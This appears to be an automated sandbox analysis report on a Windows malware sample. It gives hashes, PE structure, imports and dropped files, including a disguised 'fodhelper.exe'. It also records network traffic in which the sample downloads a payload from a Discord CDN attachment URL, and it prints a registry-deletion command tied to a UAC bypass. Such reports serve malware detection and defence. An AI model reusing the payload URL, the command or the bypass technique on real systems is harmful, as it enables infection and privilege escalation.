                    MD5:8ADA51400B7915DE2124BAAF75E3414C
                    SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                    SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                    SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                    Malicious:false
                    Preview: start /min reg delete hkcu\Environment /v windir /f..
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Lnouxqkbbgkvxwmwtigvjxpvnenadlc[1]
                    Process:C:\Users\user\Desktop\hTu8FeYy28.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):128000
                    Entropy (8bit):7.9781891482236285
                    Encrypted:false
                    SSDEEP:3072:NQr/mIsIhGMs6z4PU68TXvdIbmYKNEl+bR0RDz/Nur0S:2Pu8TXVIipNEl+yRDz16J
                    MD5:F82884CC5E7CF22E9702ADBFC1F12BEE
                    SHA1:5E8D547DFFE7611C737189CE22BB1A8393953E5D
                    SHA-256:BE474ECE5C1A58BD3C86F1CE8E7FAB9049AEADBCA5E4690E00D0751153F55F72
                    SHA-512:4BFA17059270DC17A0A9519EC989675116E869CDB6A1B68009C9E737E17DD2CC99CEA17CC2DB4798B25F3F888B2207F8B5F5360FDF847AE2850B79AFF781244E
                    Malicious:false
                    C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                    Process:C:\Users\user\Desktop\hTu8FeYy28.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1195008
                    Entropy (8bit):6.86203096819729
                    Encrypted:false
                    SSDEEP:12288:ya88qKSZvx8Lj1uE/FW/OolPkFZkmy08EsuIyOonA6hqsn4YPqyBO/JPcjSTdP3D:yaNEiX1uC7oDA9xXAJmPTY/Jke
                    MD5:A003B564BD23880F99A29006E780A89B
                    SHA1:8465374554A0C6C02F7914C1278AFD79E96ED8C4
                    SHA-256:5BC09C3C2A751169A32CF97A62765F127BCE2D0EADCE3481A6A831B6FDCC044E
                    SHA-512:0727CF12C3DD9553AFA28CDD3DE5C6970EC4F18F2CB77D437D26AEE71B8C79178209ADB3429151271EC37EE04E37C64E7FBB8C061BBF1C78F59601AEFCF3431B
                    Malicious:true
                    Joe Sandbox View:
                    • Filename: 85OZry2mNl.exe, Detection: malicious
                    • Filename: mUlwg5WgCk.exe, Detection: malicious
                    Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................v%...........................0.............................. ......................................................CODE....L........................... ..`DATA................................@...BSS......................................idata..v%.......&..................@....tls.....................................rdata....... ......................@..P.reloc......0......................@..P.rsrc................~..............@..P.....................<..............@..P........................................................................................................................................
                    C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe:Zone.Identifier
                    Process:C:\Users\user\Desktop\hTu8FeYy28.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:false
                    Preview: [ZoneTransfer]....ZoneId=0

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.86203096819729
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 91.23%
                    • Win32 Executable Borland Delphi 7 (665061/41) 6.07%
                    • Win32 Executable Borland Delphi 6 (262906/60) 2.40%
                    • Win32 Executable Delphi generic (14689/80) 0.13%
                    • Windows Screen Saver (13104/52) 0.12%
                    File name:hTu8FeYy28.exe
                    File size:1195008
                    MD5:a003b564bd23880f99a29006e780a89b
                    SHA1:8465374554a0c6c02f7914c1278afd79e96ed8c4
                    SHA256:5bc09c3c2a751169a32cf97a62765f127bce2d0eadce3481a6a831b6fdcc044e
                    SHA512:0727cf12c3dd9553afa28cdd3de5c6970ec4f18f2cb77d437d26aee71b8c79178209adb3429151271ec37ee04e37c64e7fbb8c061bbf1c78f59601aefcf3431b
                    SSDEEP:12288:ya88qKSZvx8Lj1uE/FW/OolPkFZkmy08EsuIyOonA6hqsn4YPqyBO/JPcjSTdP3D:yaNEiX1uC7oDA9xXAJmPTY/Jke
                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                    File Icon

                    Icon Hash:c4c0d4d4d4d4d4d4

                    Static PE Info

                    General

                    Entrypoint:0x48ab04
                    Entrypoint Section:CODE
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                    DLL Characteristics:
                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:c7742f6c154c117ccc5799912fd8bda5

                    Entrypoint Preview

                    Instruction
                    push ebp
                    mov ebp, esp
                    add esp, FFFFFFF0h
                    mov eax, 0048A894h
                    call 00007F7CCCD858DDh
                    mov eax, dword ptr [0048C534h]
                    mov eax, dword ptr [eax]
                    call 00007F7CCCDE52E9h
                    mov ecx, dword ptr [0048C2C4h]
                    mov eax, dword ptr [0048C534h]
                    mov eax, dword ptr [eax]
                    mov edx, dword ptr [00489924h]
                    call 00007F7CCCDE52E9h
                    mov eax, dword ptr [0048C534h]
                    mov eax, dword ptr [eax]
                    call 00007F7CCCDE535Dh
                    call 00007F7CCCD8366Ch
                    lea eax, dword ptr [eax+00h]
                    add byte ptr [eax], al

                    Data Directories

                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8e000 | 0x2576 | .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9d000 | 0x8be00 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x93000 | 0x9cd0 | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x92000 | 0x18 | .rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Sections

                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    CODE | 0x1000 | 0x89b4c | 0x89c00 | False | 0.509742584505 | data | 6.51923560789 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    DATA | 0x8b000 | 0x16f8 | 0x1800 | False | 0.423828125 | data | 4.01362753631 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    BSS | 0x8d000 | 0xda1 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .idata | 0x8e000 | 0x2576 | 0x2600 | False | 0.370065789474 | data | 5.02180680424 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .tls | 0x91000 | 0x10 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .rdata | 0x92000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.199107517787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                    .reloc | 0x93000 | 0x9cd0 | 0x9e00 | False | 0.568581882911 | data | 6.65365883915 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                    .rsrc | 0x9d000 | 0x8be00 | 0x8be00 | False | 0.360902242516 | data | 6.29042128065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                    Resources

                    Name | RVA | Size | Type | Language | Country
                    ZRCU | 0x9dbe0 | 0x3da59 | PC bitmap, Windows 3.x format, 500 x 294 x 8 | English | United States
                    RT_CURSOR | 0xdb63c | 0x134 | data | |
                    RT_CURSOR | 0xdb770 | 0x134 | data | |
                    RT_CURSOR | 0xdb8a4 | 0x134 | data | |
                    RT_CURSOR | 0xdb9d8 | 0x134 | data | |
                    RT_CURSOR | 0xdbb0c | 0x134 | data | |
                    RT_CURSOR | 0xdbc40 | 0x134 | data | |
                    RT_CURSOR | 0xdbd74 | 0x134 | data | |
                    RT_BITMAP | 0xdbea8 | 0x1d0 | data | |
                    RT_BITMAP | 0xdc078 | 0x1e4 | data | |
                    RT_BITMAP | 0xdc25c | 0x1d0 | data | |
                    RT_BITMAP | 0xdc42c | 0x1d0 | data | |
                    RT_BITMAP | 0xdc5fc | 0x44c14 | data | English | United States
                    RT_BITMAP | 0x121210 | 0x1d0 | data | |
                    RT_BITMAP | 0x1213e0 | 0x1d0 | data | |
                    RT_BITMAP | 0x1215b0 | 0x1d0 | data | |
                    RT_BITMAP | 0x121780 | 0x1d0 | data | |
                    RT_BITMAP | 0x121950 | 0x1d0 | data | |
                    RT_BITMAP | 0x121b20 | 0x1d0 | data | |
                    RT_BITMAP | 0x121cf0 | 0xe8 | GLS_BINARY_LSB_FIRST | English | United States
                    RT_ICON | 0x121dd8 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                    RT_ICON | 0x122240 | 0x10a8 | data | English | United States
                    RT_ICON | 0x1232e8 | 0x25a8 | data | English | United States
                    RT_DIALOG | 0x125890 | 0x52 | data | |
                    RT_STRING | 0x1258e4 | 0x1a0 | data | |
                    RT_STRING | 0x125a84 | 0x4e4 | data | |
                    RT_STRING | 0x125f68 | 0x1f0 | data | |
                    RT_STRING | 0x126158 | 0x1c0 | data | |
                    RT_STRING | 0x126318 | 0xdc | data | |
                    RT_STRING | 0x1263f4 | 0x488 | data | |
                    RT_STRING | 0x12687c | 0xc0 | data | |
                    RT_STRING | 0x12693c | 0xfc | data | |
                    RT_STRING | 0x126a38 | 0x120 | data | |
                    RT_STRING | 0x126b58 | 0x434 | data | |
                    RT_STRING | 0x126f8c | 0x3f0 | data | |
                    RT_STRING | 0x12737c | 0x3e4 | data | |
                    RT_STRING | 0x127760 | 0x410 | data | |
                    RT_STRING | 0x127b70 | 0x1b0 | data | |
                    RT_STRING | 0x127d20 | 0xec | data | |
                    RT_STRING | 0x127e0c | 0x1e4 | data | |
                    RT_STRING | 0x127ff0 | 0x3e8 | data | |
                    RT_STRING | 0x1283d8 | 0x358 | data | |
                    RT_STRING | 0x128730 | 0x2b4 | data | |
                    RT_RCDATA | 0x1289e4 | 0x10 | data | |
                    RT_RCDATA | 0x1289f4 | 0x320 | data | |
                    RT_GROUP_CURSOR | 0x128d14 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                    RT_GROUP_CURSOR | 0x128d28 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                    RT_GROUP_CURSOR | 0x128d3c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                    RT_GROUP_CURSOR | 0x128d50 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                    RT_GROUP_CURSOR | 0x128d64 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                    RT_GROUP_CURSOR | 0x128d78 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                    RT_GROUP_CURSOR | 0x128d8c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                    RT_GROUP_ICON | 0x128da0 | 0x30 | data | English | United States

                    Imports

                    DLL | Import
                    kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                    user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                    advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                    kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                    advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey, GetUserNameA
                    kernel32.dll | lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                    version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                    gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                    user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, 
EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                    kernel32.dllSleep
                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                    ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemAlloc, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                    oleaut32.dllGetErrorInfo, SysFreeString
                    comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                    winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
                    comdlg32.dllPrintDlgA, GetSaveFileNameA, GetOpenFileNameA
                    uRLInetIsOffline

                    Possible Origin

                    Language of compilation system | Country where language is spoken
                    English | United States

                    Network Behavior

                    Network Port Distribution

                    TCP Packets


                    UDP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Oct 8, 2021 17:51:50.713258028 CEST | 53777 | 53 | 192.168.2.3 | 8.8.8.8
                    Oct 8, 2021 17:51:50.733095884 CEST | 53 | 53777 | 8.8.8.8 | 192.168.2.3

                    DNS Queries

                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                    Oct 8, 2021 17:51:50.713258028 CEST | 192.168.2.3 | 8.8.8.8 | 0xa2a4 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)

                    DNS Answers

                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                    Oct 8, 2021 17:51:50.733095884 CEST | 8.8.8.8 | 192.168.2.3 | 0xa2a4 | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001)
                    Oct 8, 2021 17:51:50.733095884 CEST | 8.8.8.8 | 192.168.2.3 | 0xa2a4 | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001)
                    Oct 8, 2021 17:51:50.733095884 CEST | 8.8.8.8 | 192.168.2.3 | 0xa2a4 | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001)
                    Oct 8, 2021 17:51:50.733095884 CEST | 8.8.8.8 | 192.168.2.3 | 0xa2a4 | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001)
                    Oct 8, 2021 17:51:50.733095884 CEST | 8.8.8.8 | 192.168.2.3 | 0xa2a4 | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001)

                    HTTP Request Dependency Graph

                    • cdn.discordapp.com

                    HTTPS Proxied Packets

                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.3 | 49821 | 162.159.130.233 | 443 | C:\Users\user\Desktop\hTu8FeYy28.exe
                    Timestamp | kBytes transferred | Direction | Data
                    2021-10-08 15:51:51 UTC | 0 | OUT | GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1
                    User-Agent: lVali
                    Host: cdn.discordapp.com
                    2021-10-08 15:51:51 UTC | 0 | IN | HTTP/1.1 200 OK
                    Date: Fri, 08 Oct 2021 15:51:51 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 128000
                    Connection: close
                    CF-Ray: 69b088706a5e4a56-FRA
                    Accept-Ranges: bytes
                    Age: 17634
                    Cache-Control: public, max-age=31536000
                    Content-Disposition: attachment;%20filename=Lnouxqkbbgkvxwmwtigvjxpvnenadlc
                    ETag: "f82884cc5e7cf22e9702adbfc1f12bee"
                    Expires: Sat, 08 Oct 2022 15:51:51 GMT
                    Last-Modified: Fri, 08 Oct 2021 10:04:29 GMT
                    Vary: Accept-Encoding
                    CF-Cache-Status: HIT
                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                    x-goog-generation: 1633687469505069
                    x-goog-hash: crc32c=JdV9Ug==
                    x-goog-hash: md5=+CiEzF588i6XAq2/wfEr7g==
                    x-goog-metageneration: 1
                    x-goog-storage-class: STANDARD
                    x-goog-stored-content-encoding: identity
                    x-goog-stored-content-length: 128000
                    X-GUploader-UploadID: ADPycds0RnBpdJc_kVb2ENhqI_yORFMxXLMJ15oMSy2oDomj2hdfbHrpnzEnkEQU2Z1XjrrhjyYlI7T2bH5p-XkQ2X4
                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                    2021-10-08 15:51:51 UTC | 1 | IN | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OKxNSkGO1AI8AtSOzsTVvaGdGblFkJ9nwg5EpQ00EWe0UuTnvFYwDqa82KGfkpzdAz05dThNOXDNsEsuU5pfkKQA4muhySe1CxMUsjEN92L%2F6hzd7mJPHQAUFh8W6EgYNrydoQ%3D%3D"}],"group":"cf-nel","max_age":6048
                    2021-10-08 15:51:51 UTC9INData Raw: a6 03 7c c6 d9 77 14 a3 ea a7 a0 26 0b 59 30 3f ed ee 2d cd 5c b3 df 52 f6 0f 41 ec 80 fe 58 c2 ba e0 9a 52 bb dd 25 c1 68 85 fc 27 85 da f9 d9 33 bb 2c 5f 5d 1e 71 5d 15 6d 6e d6 b1 f0 24 0e c2 b8 a6 4c 04 99 92 3d a9 8d e7 2c 0b 0e cb 7e d8 da fd e4 c6 ae 58 9e 3b cd 1f 84 33 85 fe 4a 07 54 a8 58 ee 15 52 ec d6 cc 80 e1 4c 60 c3 05 7a e7 0c 85 ad ba f8 5d 55 7e d6 a1 b3 fa 2f a1 b5 98 4d c7 5d 67 1b 98 18 92 59 12 da 9c 4a 50 fa 68 f0 2d 90 76 98 6c ea cd 16 3e 7c ef fc 21 b2 6c b8 a0 38 25 ba 93 8b c7 08 8b bb 0b 4c 7f 47 8f e7 1a 28 61 1f f3 f5 f5 e3 05 76 83 f7 91 88 15 53 0f 59 1e 22 c0 fc 18 d4 c2 e5 71 7d 7f 0a b8 f0 5a bc 86 72 e5 5c a8 26 72 a6 6d 35 fd 80 9c 16 e9 0a 15 53 61 58 f3 f2 c0 a3 e7 53 26 58 a9 ff 84 26 78 c0 d2 c7 12 d6 af 9b eb 05
                    Data Ascii: |w&Y0?-\RAXR%h'3,_]q]mn$L=,~X;3JTXRL`z]U~/M]gYJPh-vl>|!l8%LG(avSY"q}Zr\&rm5SaXS&X&x
                    2021-10-08 15:51:51 UTC10INData Raw: 90 4f 25 b5 9f 73 88 37 bb 7a 95 dc a7 f5 bf 6b 6b 77 4b 86 24 62 81 05 2b 8b b8 ab b5 9b 82 21 e5 45 cc cc 12 81 56 b6 13 72 ee 07 43 ef 86 1c 22 6f 2d 95 84 51 75 21 b5 dd 7b 41 b5 e4 df 6f 56 a2 59 79 11 14 d3 6d 26 4c 00 be ec db 23 be d3 44 5c 9b a0 73 23 a9 c9 73 7f 18 16 d1 44 14 91 b8 ca ea fc 5b 2e 30 37 d4 f2 3f ea 84 2f c8 eb 16 80 df 5c 88 3d a4 0e fb ea bf 0c a6 40 00 ef a6 7e 8d c8 f2 23 bc a7 f1 a2 33 9c 2d 8f d0 bf 53 11 02 e8 d8 b7 d2 86 51 74 f0 5a ae 11 14 90 3d ea ca ad a5 d5 1d fc 03 30 4e 56 c8 85 ae 98 03 6f 7f 11 68 ff 9e 43 a7 dc bc fb dc a9 ac 47 d0 96 54 ba b5 d6 b4 11 2d a1 cf 4d d9 63 18 c6 ca d0 91 d2 c8 80 85 f2 3c 7c d2 c6 ca 9b 99 9a 5c cc 96 f4 7c 8d be a6 24 61 51 78 c2 ba a9 8f ca 9b 95 b8 e9 08 e9 0f 13 55 3e 71 65 44
                    Data Ascii: O%s7zkkwK$b+!EVrC"o-Qu!{AoVYym&L#D\s#sD[.07?/\=@~#3-SQtZ=0NVohCGT-Mc<|\|$aQxU>qeD
                    2021-10-08 15:51:51 UTC12INData Raw: 47 3c 3f 18 91 42 44 8c 48 f9 fb 0b 3e e1 0f 45 83 a9 86 41 b6 15 15 2a 7f 4b da d5 16 ea 94 e9 27 66 de 30 53 f0 51 91 fc b5 a7 65 61 92 7b 10 b6 54 e8 fd f1 e0 bb 00 ab 29 c9 c7 70 28 4c 9a 61 b2 2a bd 57 a5 8e 3f bf 3f 8a 54 e4 e8 a0 a0 2d 54 ed 61 7d 91 ca 30 65 b0 03 ca c7 9c 5a 35 93 07 01 78 d8 b6 50 dd 2e 13 0f 1c 64 c1 49 ba df 5e c5 47 94 45 88 d0 ed c9 4f 01 1a de 86 b9 63 39 a4 99 df 44 04 ce df 9b d4 16 a0 1d e8 b5 a6 10 be 5d 78 6a ac 1f c8 97 9b d1 17 04 ff 1d dc 63 56 2d e9 d7 2c 8d c9 9b dd ea 9e ea ae 58 f5 bf 48 50 e1 47 99 cf 59 37 ea 8e 45 9d d8 f4 4e b3 98 38 2b bc d3 2a 79 43 9f f4 33 ef a1 a6 73 71 2d cf 10 c4 ec 80 87 fa 3b f1 a5 a8 76 d1 13 0f 45 95 9c 44 13 55 3e 71 65 44 12 da a2 3c 71 29 df 6e e4 c8 8c 6f 60 8f b2 57 78 c0 b8
                    Data Ascii: G<?BDH>EA*K'f0SQea{T)p(La*W??T-Ta}0eZ5xP.dI^GEOc9D]xjcV-,XHPGY7EN8+*yC3sq-;vEDU>qeD<q)no`Wx
